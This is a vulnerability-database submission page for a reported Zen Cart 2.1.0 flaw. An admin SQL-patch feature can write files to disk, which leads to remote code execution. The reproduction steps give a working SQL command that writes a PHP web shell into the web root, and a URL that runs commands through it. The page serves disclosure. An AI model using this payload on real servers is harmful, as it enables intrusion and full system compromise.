Submeter #624975: Zen Ventures, LLC Zen-Cart 2.1.0 SQL Injectioninformação

TítuloZen Ventures, LLC Zen-Cart 2.1.0 SQL Injection
DescriçãoDescription The [/zencart/Horse-Kgc-fRizz/index.php?cmd=sqlpatch] endpoint allows admins to run SQL queries. This feature was created to allow developer to manually configure or modify the database but there is a problem, this feature allows you to write files including PHP shells and access them which results in RCE. This is because secure_file_priv is not set, creating a critical security issue. Reproduce Go to the following endpoint: /zencart/Horse-Kgc-fRizz/index.php?cmd=sqlpatch Use the following SQL command to upload shell to zencart directory: SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/zencart/shell.php'; Access the shell: http://127.0.0.1/zencart/shell.php?cmd=id
Fonte⚠️ https://hkohi.ca/vulnerability/29
Utilizador
 0xHamy (UID 88518)
Submissão29/07/2025 20h29 (há 9 meses)
Moderação08/08/2025 22h09 (10 days later)
EstadoAceite
Entrada VulDB319294 [Zen Cart 2.1.0 index.php?cmd=sqlpatch Autenticação fraca]
Pontos20

Do you want to use VulDB in your project?

Use the official API to access entries easily!